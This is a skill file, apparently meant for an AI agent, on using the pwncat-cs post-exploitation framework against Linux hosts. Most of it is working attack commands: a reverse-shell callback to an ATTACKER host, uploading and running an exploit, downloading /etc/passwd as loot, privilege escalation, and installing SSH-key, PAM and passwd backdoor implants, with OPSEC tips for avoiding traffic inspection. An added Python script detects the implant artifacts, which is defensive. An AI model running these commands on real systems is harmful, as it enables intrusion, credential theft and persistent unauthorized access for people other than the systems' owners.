offensive-tools/linux/pwncat/SKILL.md
Auth/lab ref: pwncat-cs Linux session management; listener/connect modes, shell stabilization, module enum, tunnel and cleanup workflow.
pwncat-cs is a shell handler + post-exploitation framework. It wraps unstable shells, exposes module-based automation (search / use / run), and manages persistence implants with reconnect support.
```bash
# Start listener for reverse shell
pwncat-cs -lp 4444
# Target callback example
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
# SSH channel (stable and preferred when creds exist)
pwncat-cs user@TARGET
# Bind shell connect
pwncat-cs connect://10.10.10.10:4444
```
- Local-prompt commands used throughout: `search`, `use`, `run`, `upload`, `download`, `escalate`.
- Sanity-check the session from the remote prompt (`id`, `uname -a`, `cat /etc/passwd`).
- Switch between the local and remote prompts with Ctrl-D.

| Command | Description |
|---|---|
| search <glob> | Find modules (ex: search enumerate.*) |
| use <module> | Enter module context |
| info | Show selected module arguments/help |
| set <arg> <value> | Set module argument in context |
| run <module> [k=v...] | Execute module directly |
| escalate list [-u user] | List available escalation paths |
| escalate run [-u user] | Execute escalation (direct + recursive chaining) |
| run implant ... | List/escalate/remove installed implants |
| upload <local> <remote> | Upload file to target |
| download <remote> <local> | Download file from target |
| back | Leave module context |
| exit | Exit pwncat |
Use the module workflow instead of ad-hoc commands:

```text
(local) pwncat$ search enumerate.*
(local) pwncat$ use enumerate.gather
(enumerate.gather) local$ info
(enumerate.gather) local$ set types file.suid
(enumerate.gather) local$ run
```

Equivalent one-liner:

```text
(local) pwncat$ run enumerate.gather types=file.suid
```
```text
# Upload local file to target
(local) pwncat$ upload /opt/tools/exploit.sh /tmp/exploit.sh
# Execute on target (remote mode command)
(remote) target$ chmod +x /tmp/exploit.sh
(remote) target$ /tmp/exploit.sh
# Download loot
(local) pwncat$ download /etc/passwd ./loot/passwd.target
# Enumerate escalation options
(local) pwncat$ escalate list
(local) pwncat$ escalate list -u root
# Execute escalation
(local) pwncat$ escalate run
(local) pwncat$ escalate run -u root
```
Notes:

- `escalate run` tries direct paths first, then recursive chains if needed.
- Confirm the result afterwards (`id`, `whoami`, access checks).

pwncat has first-class implant modules for install/list/escalate/remove.
```text
# install key implant (preferred)
(local) pwncat$ run implant.authorized_key key=./id_rsa.pub
# install as specific user (requires sufficient privileges)
(local) pwncat$ run implant.authorized_key user=john key=./id_rsa.pub
# optional high-noise / higher-risk implants
(local) pwncat$ run implant.pam password='TempBackdoor!'
(local) pwncat$ run implant.passwd backdoor_user=svc-backup backdoor_pass='TempBackdoor!'
# list implants
(local) pwncat$ run implant
(local) pwncat$ run implant list
# escalate via local implant
(local) pwncat$ run implant escalate
# remove implants at end of operation
(local) pwncat$ run implant remove
```
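The implants above leave host-side artifacts that a defender (or the operator doing cleanup) can check for. The following is an added detection example, not part of this skill or of pwncat-cs; it assumes that `implant.passwd` adds a UID-0 user with its hash written directly into `/etc/passwd` and that `implant.authorized_key` appends a key to a user's `authorized_keys`, and it runs on constructed sample file contents (`svc-backup` is the backdoor user name from the commands above).

```python
"""Check a host for the artifacts implant.passwd and implant.authorized_key
leave behind. Added detection example, not part of the skill or pwncat-cs.
Assumptions: implant.passwd adds a UID-0 user whose hash is written straight
into /etc/passwd; implant.authorized_key appends a key to authorized_keys.
All sample file contents below are constructed."""

# Constructed /etc/passwd from a hypothetical host; the last entry models
# the svc-backup backdoor user shown in the implant commands above.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
john:x:1000:1000:John:/home/john:/bin/bash
svc-backup:$6$salt$hashvalue:0:0::/root:/bin/bash
"""

# Constructed approved baseline and current authorized_keys for user john.
BASELINE_KEYS = {"ssh-ed25519 AAAAC3Nza...known john@laptop"}
CURRENT_KEYS_SAMPLE = """\
ssh-ed25519 AAAAC3Nza...known john@laptop
ssh-rsa AAAAB3NzaC1yc2E...unknown
"""

# Field-2 values meaning "hash lives in /etc/shadow" or "account locked".
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}

def suspicious_passwd_entries(passwd_text):
    """Return (user, reason) pairs for entries matching a passwd backdoor."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:  # malformed line: skip rather than guess
            continue
        user, pw_field, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 but not root"))
        if pw_field not in SHADOW_PLACEHOLDERS:
            findings.append((user, "password field is not a shadow placeholder"))
    return findings

def unexpected_keys(current_text, baseline):
    """Return authorized_keys lines that are not in the approved baseline."""
    current = {ln.strip() for ln in current_text.splitlines()
               if ln.strip() and not ln.lstrip().startswith("#")}
    return sorted(current - baseline)

if __name__ == "__main__":
    for user, reason in suspicious_passwd_entries(PASSWD_SAMPLE):
        print(f"[passwd] {user}: {reason}")
    for key in unexpected_keys(CURRENT_KEYS_SAMPLE, BASELINE_KEYS):
        print(f"[authorized_keys] not in baseline: {key}")
```

On a real host, feed the functions the contents of `/etc/passwd` and each user's `authorized_keys` against a baseline captured before the engagement; `implant.pam` is not covered here and needs a separate check of `/etc/pam.d` and the loaded PAM modules.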
If implants were installed, reconnecting is built-in:

```bash
# List known implant-enabled hosts
pwncat-cs --list
# Reconnect by host-id (best when NAT/shared IP)
pwncat-cs <host-id>
# Reconnect by user@host (tries known implants then ssh fallback)
pwncat-cs user@TARGET
```
```bash
# catch raw reverse shell
pwncat-cs -lp 4444
# connect to bind shell
pwncat-cs connect://10.10.10.10:4444
# ssh channel
pwncat-cs ssh://user:PASSWORD@TARGET
pwncat-cs -i ./id_rsa user@TARGET
# encrypted listener (auto self-signed cert)
pwncat-cs --ssl -lp 4444
# windows platform example (out of scope for this skill)
pwncat-cs -m windows -lp 4444
```
OPSEC notes:

- Use explicit connection URIs (`bind://`, `connect://`, `ssh://`) in scripts.
- Prefer `implant.authorized_key` over password implants when feasible.
- Use the encrypted listener (`--ssl`) when traffic inspection risk is high.
- Remove implants at the end of the operation (`run implant remove`).
- Check for an existing module with `search` first.

| Skill | Why combine |
|---|---|
| linpeas | Deep Linux enumeration outside pwncat modules |
| linux-persistence | Persistence tradeoffs and hardening-aware patterns |
| ssh-key-scanner | Key discovery and lateral movement planning |
Pitfall: don't confuse the `pwncat` and `pwncat-cs` binary names (the PyPI package `pwncat` is an unrelated tool).

| File | When to load |
|---|---|
| references/module-workflow-cheatsheet.md | When you need exact search/use/set/run and escalate usage patterns |
| references/connection-modes-and-opsec.md | When selecting bind/connect/ssh/ssl mode and planning low-noise access |
| references/post-exploitation-playbook.md | For end-to-end Linux flow: access → enum → escalate → persist → reconnect → cleanup |